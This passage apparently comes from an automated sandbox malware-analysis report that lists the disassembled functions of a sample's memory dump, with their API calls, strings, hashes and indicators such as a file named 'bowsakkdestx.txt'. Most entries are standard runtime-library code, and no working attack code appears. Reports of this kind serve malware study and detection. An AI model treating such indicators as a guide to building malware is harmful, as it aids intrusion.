                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                  • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                                  • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                                  • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                  • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                                  • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                                  • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                                  • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                                  • API String ID: 2102423945-2013712220
                                                                                                  • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                  • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                                  • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                                  • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringUuid$CreateFree
                                                                                                  • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                  • API String ID: 3044360575-2335240114
                                                                                                  • Opcode ID: 33d66bd02b00bc2acc34edfe8eeb3cae24413370cf945822c3da00e57b4ae0fc
                                                                                                  • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                                  • Opcode Fuzzy Hash: 33d66bd02b00bc2acc34edfe8eeb3cae24413370cf945822c3da00e57b4ae0fc
                                                                                                  • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                  • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                                  • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                                  • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00423B64
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • std::exception::exception.LIBCMT ref: 00423B82
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                  • String ID: bad allocation
                                                                                                  • API String ID: 1059622496-2104205924
                                                                                                  • Opcode ID: 41bf15d191ee332efc5d8a0fe9748f7adc23f195bb226c07080af7c104addcbf
                                                                                                  • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                                  • Opcode Fuzzy Hash: 41bf15d191ee332efc5d8a0fe9748f7adc23f195bb226c07080af7c104addcbf
                                                                                                  • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: 0$LPCWSTRszWindowClass
                                                                                                  • API String ID: 1693014935-1496217519
                                                                                                  • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                  • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                                  • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                                  • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                  • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                                  • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                                  • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                                                                                  • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove_strtok
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446180046-0
                                                                                                  • Opcode ID: 68252e2aabc9db2da3c32abe8a95286ef25f2bf5a015f2012d521dff1bbfc377
                                                                                                  • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                  • Opcode Fuzzy Hash: 68252e2aabc9db2da3c32abe8a95286ef25f2bf5a015f2012d521dff1bbfc377
                                                                                                  • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                  • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                  • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                  • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                  • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                  • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                  • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  • Opcode ID: 8dcdb29b30e90d7a1a332818a0ca901bbec9447c67136dec38103fe4222814ab
                                                                                                  • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                                  • Opcode Fuzzy Hash: 8dcdb29b30e90d7a1a332818a0ca901bbec9447c67136dec38103fe4222814ab
                                                                                                  • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                    • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                    • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                    • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                  • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                    • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                  • __lock.LIBCMT ref: 00425A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                  • __lock.LIBCMT ref: 00425A57
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                  • String ID:
                                                                                                  • API String ID: 2580527540-0
                                                                                                  • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                  • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                  • _malloc.LIBCMT ref: 004127C3
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 004127CE
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3705855051-0
                                                                                                  • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                  • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                  • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                  • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32 ref: 00412806
                                                                                                  • _malloc.LIBCMT ref: 00412814
